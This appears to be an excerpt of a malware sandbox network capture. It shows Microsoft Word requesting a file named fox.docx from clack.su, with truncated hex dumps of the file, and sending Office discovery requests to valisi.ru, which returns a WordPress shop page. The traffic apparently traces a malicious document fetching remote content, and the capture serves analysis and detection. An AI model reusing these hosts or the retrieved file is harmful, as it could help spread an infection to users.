        Cookie: PHPSESSID=b9e6303e515dc6233f459e6662a37489; wfvt_733659977=6802f1f8a0a59; wfvt_733659977=6802f1f7a44ac; PHPSESSID=eba6953baf6806e6900f830f92e49542
        Apr 19, 2025 02:44:41.626091003 CEST352INHTTP/1.1 200 OK
        Connection: Keep-Alive
        Keep-Alive: timeout=5, max=100
        content-type: application/vnd.openxmlformats-officedocument.wordprocessingml.document
        last-modified: Wed, 19 Mar 2025 11:29:09 GMT
        etag: "6eac-67daaa85-b8348916368e5d6e;;;"
        accept-ranges: bytes
        content-length: 28332
        date: Sat, 19 Apr 2025 00:44:41 GMT
        server: LiteSpeed


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        3192.168.2.44972691.218.228.26807720C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        TimestampBytes transferredDirectionData
        Apr 19, 2025 02:44:42.066957951 CEST255OUTGET /fox.docx HTTP/1.1
        Accept: */*
        User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)
        Accept-Encoding: gzip, deflate
        Host: clack.su
        Connection: Keep-Alive
        Cookie: PHPSESSID=b9e6303e515dc6233f459e6662a37489; wfvt_733659977=6802f1f8a0a59
        Apr 19, 2025 02:44:42.439097881 CEST1358INHTTP/1.1 200 OK
        Connection: Keep-Alive
        Keep-Alive: timeout=5, max=100
        content-type: application/vnd.openxmlformats-officedocument.wordprocessingml.document
        last-modified: Wed, 19 Mar 2025 11:29:09 GMT
        etag: "6eac-67daaa85-b8348916368e5d6e;;;"
        accept-ranges: bytes
        content-length: 28332
        date: Sat, 19 Apr 2025 00:44:42 GMT
        server: LiteSpeed
        Data Raw: 50 4b 03 04 14 00 00 00 08 00 00 00 21 00 1e 91 1a b7 ea 00 00 00 4e 02 00 00 0b 00 00 00 5f 72 65 6c 73 2f 2e 72 65 6c 73 8d 92 51 4b c4 30 0c 80 df 05 ff 43 c9 fb 2d bb 13 44 e4 ba 7b 11 e1 de 44 e6 0f 08 6d b6 95 db da d2 46 bd fb f7 56 50 74 70 9e 7b 6c 9a 7c f9 12 b2 dd 1d a7 51 bd 71 ca 2e 78 0d eb aa 06 c5 de 04 eb 7c af e1 a5 7d 5c dd 81 ca 42 de d2 18 3c 6b 38 71 86 5d 73 7d b5 7d e6 91 a4 14 e5 c1 c5 ac 0a c5 67 0d 83 48 bc 47 cc 66 e0 89 72 15 22 fb f2 d3 85 34 91 94 67 ea 31 92 39 50 cf b8 a9 eb 5b 4c bf 19 d0 cc 98 6a 6f 35 a4 bd bd 01 d5 9e 22 2f 61 87 ae 73 86 1f 82 79 9d d8 cb 99 16 c8 47 61 6f d9 ae 62 2a f5 49 5c 99 46 b5 94 7a 16 0d 36 98 a7 12 ce 48 31 56 05 0d 78 de 68 b3 dc e8 ef 69 71 62 21 4b 42 68 42 e2 cb 3e 9f 19 97 84 d6 cb 85 fe 5f d1 3c e3 c7 e6 3d 24 8b f6 2b fc 6d 83 b3 2b 68 3e 00 50 4b 03 04 14 00 00 00 00 00 d9 41 73 5a 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 63 75 73 74 6f 6d 58 6d 6c 2f 5f 72 65 6c 73 2f 50 4b 03 04 14 00 00 00 08 00 00 00 21 00 74 3f 39 [TRUNCATED]
        Data Ascii: PK!N_rels/.relsQK0C-D{DmFVPtp{l|Qq.x|}\B<k8q]s}}gHGfr"4g19P[Ljo5"/asyGaob*I\Fz6H1Vxhiqb!KBhB>_<=$+m+h>PKAsZcustomXml/_rels/PK!t?9z(customXml/_rels/item1.xml.rels0hoPK)t;JGILcXji+t(QE]1hjP>N~j.G{JD60o,W0H9X)ctl'_u|P=;6w#wEvd*yB1kPK!&customXml/item1.xml0_e:=l"6D/9|rqu]v|y2O:WX7J.`pY'JE\k6gt&S+!mA=)~PI5#v $3bdz^)t`0m38UfsbG5{,Z}PK!McustomXml/itemProps1.xmleAk0]cE]Z^Cw&#Xix3Lss>t-{r8wiRnT3:hCv1FE*z8$6L'Sb/dZ^H eYK"
        Apr 19, 2025 02:44:42.439110994 CEST1358INData Raw: 45 9b d0 b2 2b d1 72 e0 3c e8 2b 58 15 32 5c c0 c5 e1 84 de 2a 8a d2 5f 38 4e 93 d1 20 51 af 16 1c f1 22 cf 1f b9 5e 23 de 9e ed cc ba 2d cf cf f6 0b 4c e1 af dc a2 ad de fc a3 58 a3 3d 06 9c 28 d3 68 7f 01 9b 71 cd 71 a5 b0 a8 a8 2c 90 da ce 64
        Data Ascii: E+r<+X2\*_8N Q"^#-LX=(hqq,dkPK!ZCbdocProps/app.xmlSn0?7J+EbaCmL;lIXY{O#)Zz\d/>vq-D8b7>`$)c
        Apr 19, 2025 02:44:42.439124107 CEST1358INData Raw: fd bc 70 01 dc fa cc ff 82 f4 15 10 69 0d 26 3d 4c 44 67 13 91 4f 92 f9 26 9c fb 70 e3 33 df 9e d4 60 cf e8 e0 c1 27 c2 fc 2f 63 58 06 7e f4 1f 5c ff 00 50 4b 03 04 14 00 00 00 08 00 ee 41 73 5a c9 5f ac 4e cc 00 00 00 4c 01 00 00 1c 00 00 00 77
        Data Ascii: pi&=LDgO&p3`'/cX~\PKAsZ_NLword/_rels/settings.xml.relsN1ws2 .:bj, *10iNQq(nAQX^A`vK&b7;E>[&RfQBJ+Wo+S
        Apr 19, 2025 02:44:42.439194918 CEST1358INData Raw: 8b a6 4d 44 5d 60 c2 bc 8c 5b 36 99 c9 d9 22 71 ef 54 92 7b 65 7b 68 b8 dd 82 2d 32 43 80 71 7f 54 1d a4 3f 43 f7 ea 9b 6b d4 fc 43 6e f6 2f 50 4b 03 04 14 00 00 00 08 00 00 00 21 00 da cc b4 e2 53 02 00 00 1e 0a 00 00 11 00 00 00 77 6f 72 64 2f
        Data Ascii: MD]`[6"qT{e{h-2CqT?CkCn/PK!Sword/endnotes.xml0@.AIfhU3xI&$o-C]tcH#3+AGT\7yTIAgfu1K!mkAt&N*qSVI)21/Q
        Apr 19, 2025 02:44:42.439208031 CEST1358INData Raw: 5f ef 46 5c d1 54 0f bc 9a 12 93 da 76 70 ac c4 39 7f 66 b3 6a 7d ae 8b e1 24 dc d5 87 93 7e 27 ee 0f 93 c3 fa c2 b7 ea c3 7b 91 13 eb 1b 8d d1 8f 3b 6d 53 4e 5f f1 3e 74 2a d7 0e 92 a3 9b 5d 4f e2 1d de 77 30 f6 37 3b be e9 77 86 5f 86 15 ef 87
        Data Ascii: _F\Tvp9fj}$~'{;mSN_>t*]Ow07;w_mM7ML>0WPK!iQ,word/footer1.xml]O0'?XN E-iht8MCRi?~GJ>~G5&b2r}
        Apr 19, 2025 02:44:42.439218044 CEST1358INData Raw: b7 d7 51 cf ed f2 da f1 b4 a8 52 79 02 f6 b1 5f e7 5f f0 ca f9 db c4 28 ec b1 22 1e d1 2a fa 58 78 3e 67 e3 44 40 15 9e 26 1e 94 9a 9f 92 1b f5 3c 40 1a c0 a8 03 88 69 d1 b3 a4 1b 46 5c 33 30 28 7f e2 58 76 1e 66 d2 60 ec 51 9c b6 fa 5e 6f ce c3
        Data Ascii: QRy__("*Xx>gD@&<@iF\30(Xvf`Q^oD+~&O'3,@h8M>m2#!e@z"4'pHAd9W-w~$ZJ2;r%;RbnqYS4rqD~lJ0oZ
        Apr 19, 2025 02:44:42.439229012 CEST1358INData Raw: 8b e3 31 c8 9f 00 82 1d fa de 18 35 bf 18 15 62 ab 6a 04 ba 99 04 02 55 23 52 30 8d f4 1f 9b 0b a7 91 fc 31 29 9a 46 9a 8f 49 f1 34 d2 28 9d ea 71 82 0b c9 38 0c 6e 84 aa 89 81 a6 da e2 9a a8 e7 9d 9c 01 58 12 53 7e 2e ab d2 bc 00 d3 0d 7b 0c 29
        Data Ascii: 15bjU#R01)FI4(q8nXS~.{)E`5y~1!Y5{HNVzwBd%f4;UuQSi0X6~Azg+O'9;UD=#"1X#$|\ )3+fa_Q?eo
        Apr 19, 2025 02:44:42.439239979 CEST1358INData Raw: 4c 43 59 8b 1d 3b db 9c 6c 74 66 da 57 b3 a8 f5 64 23 dd 9b 85 f3 60 ee ba f3 66 fb b2 04 62 2e 4a 70 4a dd ce 88 21 cb 82 5b 51 60 01 0b 6d 8a e3 07 22 a5 15 99 a0 26 fc 5c bb c9 d5 ef ab 06 68 7d 26 5b d6 16 0b 66 88 65 63 2a 14 9b 40 26 48 a6
        Data Ascii: LCY;ltfWd#`fb.JpJ![Q`m"&\h}&[fec*@&HL1)wlJdjk]{:<AT@SvOvoXuJ?a2&w~LnI4n'{sqMC*hEPWGU~ YhO_6\6'\PKA
        Apr 19, 2025 02:44:42.439245939 CEST1358INData Raw: bc 56 b2 8f 84 69 b2 fb ea 4d d6 3e b2 28 33 09 ed c8 76 9f d1 5b 51 5f 55 d9 e8 72 d9 a9 01 76 97 b8 8f 32 a7 d9 e5 99 53 64 b7 59 bb 56 2a 3a 30 f9 8a 2e 31 14 b1 2c 64 93 c9 6f f7 51 ea ad a4 c7 37 88 7a 43 97 b8 af 7a 44 a3 d5 e0 b2 bb 3c bd
        Data Ascii: ViM>(3v[Q_Urv2SdYV*:0.1,doQ7zCzD<0(.rR]y 5|pA#7WGgjd6]w'uJwk[5u47@h6/PC"`u ;>[/:9&2s
        Apr 19, 2025 02:44:42.439256907 CEST1358INData Raw: 48 48 08 07 09 09 e1 20 21 21 1c 24 24 84 83 84 84 70 90 90 10 0e 12 12 c2 41 42 42 38 48 48 08 07 09 09 e1 20 21 21 1c 24 24 84 83 84 84 70 90 90 10 0e 12 12 c2 41 42 42 38 48 48 f8 ff 0f c2 ed 79 f5 94 74 5a f2 c4 6d e2 82 fc ce 4f 79 93 8d 06
        Data Ascii: HH !!$$pABB8HH !!$$pABB8HHytZmOy2ce)zKWQisNSXg8LfzK"AnvEHB+, (%H'R@mqX(oSK@V f;l
        Apr 19, 2025 02:44:42.811322927 CEST1358INData Raw: 6d 44 5a 55 da bc b4 67 d2 2e a5 73 d2 b5 e9 cd e9 9b d3 cf a4 df ce c8 cc 98 94 b1 34 e3 58 c6 e7 99 09 99 c6 cc 39 99 cf 64 7e 3c 32 72 64 c1 c8 59 23 f7 8e 7c 6f 14 73 94 76 54 cb a8 27 47 bd 93 85 67 a9 b2 9a b3 b6 67 bd 3d 1a 1f ad 1e 6d 1b
        Data Ascii: mDZUg.s4X9d~<2rdY#|osvT'Ggg=msD'qJJ.f[S(X4TZJf}DcEq[y,.O(S,PF9ZI*w*?PTU5jMffV]^_kL1|K'3
        Apr 19, 2025 02:44:42.857609987 CEST293OUTHEAD /fox.docx HTTP/1.1
        Authorization: Bearer
        X-MS-CookieUri-Requested: t
        X-FeatureVersion: 1
        X-IDCRL_ACCEPTED: t
        User-Agent: Microsoft Office Existence Discovery
        Host: clack.su
        Connection: Keep-Alive
        Cookie: PHPSESSID=b9e6303e515dc6233f459e6662a37489; wfvt_733659977=6802f1f8a0a59
        Apr 19, 2025 02:44:43.229506969 CEST352INHTTP/1.1 200 OK
        Connection: Keep-Alive
        Keep-Alive: timeout=5, max=100
        content-type: application/vnd.openxmlformats-officedocument.wordprocessingml.document
        last-modified: Wed, 19 Mar 2025 11:29:09 GMT
        etag: "6eac-67daaa85-b8348916368e5d6e;;;"
        accept-ranges: bytes
        content-length: 28332
        date: Sat, 19 Apr 2025 00:44:43 GMT
        server: LiteSpeed


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        4192.168.2.44973091.218.228.26807720C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        TimestampBytes transferredDirectionData
        Apr 19, 2025 02:44:43.620726109 CEST322OUTOPTIONS / HTTP/1.1
        Connection: Keep-Alive
        Authorization: Bearer
        User-Agent: Microsoft Office Word 2014
        X-Office-Major-Version: 16
        X-MS-CookieUri-Requested: t
        X-FeatureVersion: 1
        Accept-Auth: badger,Wlid1.1,Bearer,Basic,NTLM,Digest,Kerberos,Negotiate,Nego2
        X-MSGETWEBURL: t
        X-IDCRL_ACCEPTED: t
        Host: valisi.ru
        Apr 19, 2025 02:44:44.100126982 CEST1358INHTTP/1.1 200 OK
        Connection: Keep-Alive
        Keep-Alive: timeout=5, max=100
        x-powered-by: PHP/5.4.45
        set-cookie: PHPSESSID=c23817273c64555c130cc0150a4922ad; path=/
        expires: Thu, 19 Nov 1981 08:52:00 GMT
        cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
        pragma: no-cache
        set-cookie: wfvt_1026485859=6802f1fbe39a9; expires=Sat, 19-Apr-2025 01:14:43 GMT; path=/; httponly
        content-type: text/html; charset=UTF-8
        link: <http://valisi.ru/wp-json/>; rel="https://api.w.org/"
        transfer-encoding: chunked
        date: Sat, 19 Apr 2025 00:44:43 GMT
        server: LiteSpeed
        Data Raw: 32 30 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 31 31 30 30 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 41 64 76 61 6e 63 65 64 20 73 74 75 64 69 6f 22 3e 0a 09 3c 74 69 74 6c 65 3e 46 69 6c 6d 74 65 63 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 53 4b 59 50 45 5f 54 4f 4f 4c 42 41 52 22 20 63 6f 6e 74 65 6e 74 3d 22 53 4b 59 50 45 5f 54 4f 4f 4c 42 41 52 5f 50 41 52 53 45 52 5f 43 4f 4d 50 41 54 49 42 4c 45 22 20 2f 3e 0a 09 0a 09 3c 21 2d 2d 20 63 73 73 20 2d 2d 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 76 61 6c 69 73 69 2e 72 75 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f [TRUNCATED]
        Data Ascii: 20de<!DOCTYPE html><html lang="ru"><head><meta charset="UTF-8"><meta name="viewport" content="width=1100"><meta name="author" content="Advanced studio"><title>Filmtec</title><meta name="SKYPE_TOOLBAR" content="SKYPE_TOOLBAR_PARSER_COMPATIBLE" />... css --><link rel="shortcut icon" href="http://valisi.ru/wp-content/themes/filtrest/favicon.ico"><link href='https://fonts.googleapis.com/css?family=Fira+Sans:400,300,500,700&subset=latin,cyrillic' rel='stylesheet' type='text/css'><link rel="stylesheet" href="http://valisi.ru/wp-content/themes/filtrest/jquery.fancybox.css" media="screen"><link rel="stylesheet" href="http://valisi.ru/wp-content/themes/filtrest/style.css?3" media="screen">...[if lt IE 9]> <script src="http://html5shiv
        Apr 19, 2025 02:44:44.100192070 CEST1358INData Raw: 2e 67 6f 6f 67 6c 65 63 6f 64 65 2e 63 6f 6d 2f 73 76 6e 2f 74 72 75 6e 6b 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 69 65 37 2d 6a 73 2e 67 6f 6f 67 6c 65
        Data Ascii: .googlecode.com/svn/trunk/html5.js"></script> <script src="http://ie7-js.googlecode.com/svn/version/2.1(beta4)/IE9.js"></script> <![endif]--><script type="text/javascript">window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/i
        Apr 19, 2025 02:44:44.100279093 CEST1358INData Raw: 21 3d 3d 72 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 31 36 2c 31 36 2c 31 2c 31 29 2e 64 61 74 61 5b 30 5d 7d 72 65 74 75 72 6e 21 31 7d 28 72 5b 6e 5d 29 2c 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 74 2e 73 75 70 70 6f
        Data Ascii: !==r.getImageData(16,16,1,1).data[0]}return!1}(r[n]),t.supports.everything=t.supports.everything&&t.supports[r[n]],"flag"!==r[n]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[r[n]]);t.supports.everythingExceptFl
        Apr 19, 2025 02:44:44.100291967 CEST1358INData Raw: 73 2f 77 70 2d 73 68 6f 70 2d 6f 72 69 67 69 6e 61 6c 2f 77 70 2d 73 68 6f 70 2e 63 73 73 3f 76 65 72 3d 31 39 38 61 35 37 32 66 30 32 30 34 34 61 34 36 34 61 33 35 34 37 66 66 37 35 36 35 34 36 30 32 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73
        Data Ascii: s/wp-shop-original/wp-shop.css?ver=198a572f02044a464a3547ff75654602' type='text/css' media='all' /><link rel='stylesheet' id='wp-shop_style-css' href='http://valisi.ru/wp-content/plugins/wp-shop-original/styles/default.css?ver=198a572f02044a
        Apr 19, 2025 02:44:44.100311995 CEST1358INData Raw: 5c 75 30 34 34 63 5c 75 30 34 33 37 5c 75 30 34 33 65 5c 75 30 34 33 32 5c 75 30 34 33 30 5c 75 30 34 33 62 5c 75 30 34 33 38 20 5c 75 30 34 33 66 5c 75 30 34 34 30 5c 75 30 34 33 65 5c 75 30 34 33 63 5c 75 30 34 33 65 5c 75 30 34 33 61 5c 75 30
        Data Ascii: \u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u043f\u0440\u043e\u043c\u043e\u043a\u043e\u0434: ","show_panel":"0","yandex":"","promocode":"0","cartpage":"http:\/\/valisi.ru\/cart\/","order":"\u041e\u0444\u043e\u0440\u043c\u0438\u0442\u044c \u043
        Apr 19, 2025 02:44:44.100327015 CEST1358INData Raw: 6e 5f 6c 69 6e 6b 22 3a 22 23 22 2c 22 63 6f 6e 74 5f 73 68 6f 70 22 3a 22 5c 75 30 34 31 66 5c 75 30 34 34 30 5c 75 30 34 33 65 5c 75 30 34 33 34 5c 75 30 34 33 65 5c 75 30 34 33 62 5c 75 30 34 33 36 5c 75 30 34 33 38 5c 75 30 34 34 32 5c 75 30
        Data Ascii: n_link":"#","cont_shop":"\u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0438\u0442\u044c \u043f\u043e\u043a\u0443\u043f\u043a\u0438","is_empty":"\u0412\u0430\u0448\u0430 \u043a\u043e\u0440\u0437\u0438\u043d\u0430 \u043f\u0443\u0441\u0442\u0430.",
        Apr 19, 2025 02:44:44.100351095 CEST861INData Raw: 75 6d 65 6e 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 65 76 74 2c 20 68 61 6e 64 6c 65 72 2c 20 66 61 6c 73 65 29 3b 0a 09 09 7d 20 65 6c 73 65 20 69 66 20 28 77 69 6e 64 6f 77 2e 64 65 74 61 63 68 45 76 65 6e 74 29 20 7b
        Data Ascii: ument.removeEventListener(evt, handler, false);} else if (window.detachEvent) {document.detachEvent('on' + evt, handler);}};var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypres
        Apr 19, 2025 02:44:44.199604988 CEST1358INData Raw: 32 30 63 38 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 76 61 72 20 5f 5f 63 61 72 74 20 3d 20 30 3b 0a 09 76 61 72 20 5f 5f 77 20 3d 20 30 3b 0a 0a 09 43 55 52 52 20 3d 20 22 45 55 52
        Data Ascii: 20c8<script type="text/javascript">var __cart = 0;var __w = 0;CURR = "EUR";jQuery(document).ready(function(){if (window.Cart !== undefined){window.__cart = new window.Cart("wpshop_minicart", "wpshop_cart");}if (w
        Apr 19, 2025 02:44:44.199687004 CEST1358INData Raw: 72 72 65 6e 74 5f 70 61 67 65 5f 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 6f 6d 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 36 32 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 76 61 6c 69 73 69 2e 72 75 2f 22 3e d0 93 d0 bb d0 b0 d0 b2 d0
        Data Ascii: rrent_page_item menu-item-home menu-item-62"><a href="http://valisi.ru/"></a></li><li id="menu-item-67" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-67"><a href="http://valisi.ru/about/">
        Apr 19, 2025 02:44:44.225159883 CEST1358INData Raw: 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 36 2f 30 35 2f 70 72 69 63 65 5f 68 79 64 72 6f 74 65 63 68 5f 32 30 31 35 2e 70 64 66 22 20 63 6c 61 73 73 3d 22 73 6c 69 64 65 2d 6c 69 6e 6b 22 3e d0 9f d1 80 d0 b0 d0 b9 d1 81 2d d0 bb d0
        Data Ascii: ontent/uploads/2016/05/price_hydrotech_2015.pdf" class="slide-link">-</a></div> ... /slider --><div class="content"><ul class="cat maincat"><li><a href="http://valisi.ru/obezzhelezivanie/" class="cat-img"><img src
        Apr 19, 2025 02:44:44.331327915 CEST1358INData Raw: 61 74 2d 74 69 74 6c 65 22 3e d0 9e d0 b1 d0 b5 d1 81 d1 81 d0 be d0 bb d0 b8 d0 b2 d0 b0 d0 bd d0 b8 d0 b5 3c 2f 61 3e 0a 09 09 3c 75 6c 20 63 6c 61 73 73 3d 22 63 61 74 2d 73 75 62 6d 65 6e 75 22 3e 0a 09 09 09 09 09 3c 2f 75 6c 3e 0a 09 09 3c
        Data Ascii: at-title"></a><ul class="cat-submenu"></ul><li><a href="http://valisi.ru/reagenty/" class="cat-img"><img src="http://valisi.ru/wp-content/uploads/2016/05/reagenty-e14119751904911.png" alt="


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        5192.168.2.44973191.218.228.26807720C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        TimestampBytes transferredDirectionData
        Apr 19, 2025 02:44:44.489150047 CEST225OUTOPTIONS / HTTP/1.1
        Authorization: Bearer
        X-MS-CookieUri-Requested: t
        X-FeatureVersion: 1
        X-IDCRL_ACCEPTED: t
        User-Agent: Microsoft Office Protocol Discovery
        Host: valisi.ru
        Content-Length: 0
        Connection: Keep-Alive
        Apr 19, 2025 02:44:45.155724049 CEST1358INHTTP/1.1 200 OK
        Connection: Keep-Alive
        Keep-Alive: timeout=5, max=100
        x-powered-by: PHP/5.4.45
        set-cookie: PHPSESSID=9f1887f17763dca70f238dcccd64fc52; path=/
        expires: Thu, 19 Nov 1981 08:52:00 GMT
        cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
        pragma: no-cache
        set-cookie: wfvt_1026485859=6802f1fcf250d; expires=Sat, 19-Apr-2025 01:14:44 GMT; path=/; httponly
        content-type: text/html; charset=UTF-8
        link: <http://valisi.ru/wp-json/>; rel="https://api.w.org/"
        transfer-encoding: chunked
        date: Sat, 19 Apr 2025 00:44:45 GMT
        server: LiteSpeed
        Data Raw: 32 30 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 31 31 30 30 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 41 64 76 61 6e 63 65 64 20 73 74 75 64 69 6f 22 3e 0a 09 3c 74 69 74 6c 65 3e 46 69 6c 6d 74 65 63 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 53 4b 59 50 45 5f 54 4f 4f 4c 42 41 52 22 20 63 6f 6e 74 65 6e 74 3d 22 53 4b 59 50 45 5f 54 4f 4f 4c 42 41 52 5f 50 41 52 53 45 52 5f 43 4f 4d 50 41 54 49 42 4c 45 22 20 2f 3e 0a 09 0a 09 3c 21 2d 2d 20 63 73 73 20 2d 2d 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 76 61 6c 69 73 69 2e 72 75 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f [TRUNCATED]
        Data Ascii: 20de<!DOCTYPE html><html lang="ru"><head><meta charset="UTF-8"><meta name="viewport" content="width=1100"><meta name="author" content="Advanced studio"><title>Filmtec</title><meta name="SKYPE_TOOLBAR" content="SKYPE_TOOLBAR_PARSER_COMPATIBLE" />... css --><link rel="shortcut icon" href="http://valisi.ru/wp-content/themes/filtrest/favicon.ico"><link href='https://fonts.googleapis.com/css?family=Fira+Sans:400,300,500,700&subset=latin,cyrillic' rel='stylesheet' type='text/css'><link rel="stylesheet" href="http://valisi.ru/wp-content/themes/filtrest/jquery.fancybox.css" media="screen"><link rel="stylesheet" href="http://valisi.ru/wp-content/themes/filtrest/style.css?3" media="screen">...[if lt IE 9]> <script src="http://html5shiv
        Apr 19, 2025 02:44:45.155778885 CEST1358INData Raw: 2e 67 6f 6f 67 6c 65 63 6f 64 65 2e 63 6f 6d 2f 73 76 6e 2f 74 72 75 6e 6b 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 69 65 37 2d 6a 73 2e 67 6f 6f 67 6c 65
        Data Ascii: .googlecode.com/svn/trunk/html5.js"></script> <script src="http://ie7-js.googlecode.com/svn/version/2.1(beta4)/IE9.js"></script> <![endif]--><script type="text/javascript">window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/i
        Apr 19, 2025 02:44:45.155826092 CEST1358INData Raw: 21 3d 3d 72 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 31 36 2c 31 36 2c 31 2c 31 29 2e 64 61 74 61 5b 30 5d 7d 72 65 74 75 72 6e 21 31 7d 28 72 5b 6e 5d 29 2c 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 74 2e 73 75 70 70 6f
        Data Ascii: !==r.getImageData(16,16,1,1).data[0]}return!1}(r[n]),t.supports.everything=t.supports.everything&&t.supports[r[n]],"flag"!==r[n]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[r[n]]);t.supports.everythingExceptFl
        Apr 19, 2025 02:44:45.155875921 CEST1358INData Raw: 73 2f 77 70 2d 73 68 6f 70 2d 6f 72 69 67 69 6e 61 6c 2f 77 70 2d 73 68 6f 70 2e 63 73 73 3f 76 65 72 3d 31 39 38 61 35 37 32 66 30 32 30 34 34 61 34 36 34 61 33 35 34 37 66 66 37 35 36 35 34 36 30 32 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73
        Data Ascii: s/wp-shop-original/wp-shop.css?ver=198a572f02044a464a3547ff75654602' type='text/css' media='all' /><link rel='stylesheet' id='wp-shop_style-css' href='http://valisi.ru/wp-content/plugins/wp-shop-original/styles/default.css?ver=198a572f02044a
        Apr 19, 2025 02:44:45.155936956 CEST1358INData Raw: 5c 75 30 34 34 63 5c 75 30 34 33 37 5c 75 30 34 33 65 5c 75 30 34 33 32 5c 75 30 34 33 30 5c 75 30 34 33 62 5c 75 30 34 33 38 20 5c 75 30 34 33 66 5c 75 30 34 34 30 5c 75 30 34 33 65 5c 75 30 34 33 63 5c 75 30 34 33 65 5c 75 30 34 33 61 5c 75 30
        Data Ascii: \u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u043f\u0440\u043e\u043c\u043e\u043a\u043e\u0434: ","show_panel":"0","yandex":"","promocode":"0","cartpage":"http:\/\/valisi.ru\/cart\/","order":"\u041e\u0444\u043e\u0440\u043c\u0438\u0442\u044c \u043
        Apr 19, 2025 02:44:45.155983925 CEST1358INData Raw: 6e 5f 6c 69 6e 6b 22 3a 22 23 22 2c 22 63 6f 6e 74 5f 73 68 6f 70 22 3a 22 5c 75 30 34 31 66 5c 75 30 34 34 30 5c 75 30 34 33 65 5c 75 30 34 33 34 5c 75 30 34 33 65 5c 75 30 34 33 62 5c 75 30 34 33 36 5c 75 30 34 33 38 5c 75 30 34 34 32 5c 75 30
        Data Ascii: n_link":"#","cont_shop":"\u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0438\u0442\u044c \u043f\u043e\u043a\u0443\u043f\u043a\u0438","is_empty":"\u0412\u0430\u0448\u0430 \u043a\u043e\u0440\u0437\u0438\u043d\u0430 \u043f\u0443\u0441\u0442\u0430.",
        Apr 19, 2025 02:44:45.156048059 CEST861INData Raw: 75 6d 65 6e 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 65 76 74 2c 20 68 61 6e 64 6c 65 72 2c 20 66 61 6c 73 65 29 3b 0a 09 09 7d 20 65 6c 73 65 20 69 66 20 28 77 69 6e 64 6f 77 2e 64 65 74 61 63 68 45 76 65 6e 74 29 20 7b
        Data Ascii: ument.removeEventListener(evt, handler, false);} else if (window.detachEvent) {document.detachEvent('on' + evt, handler);}};var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypres
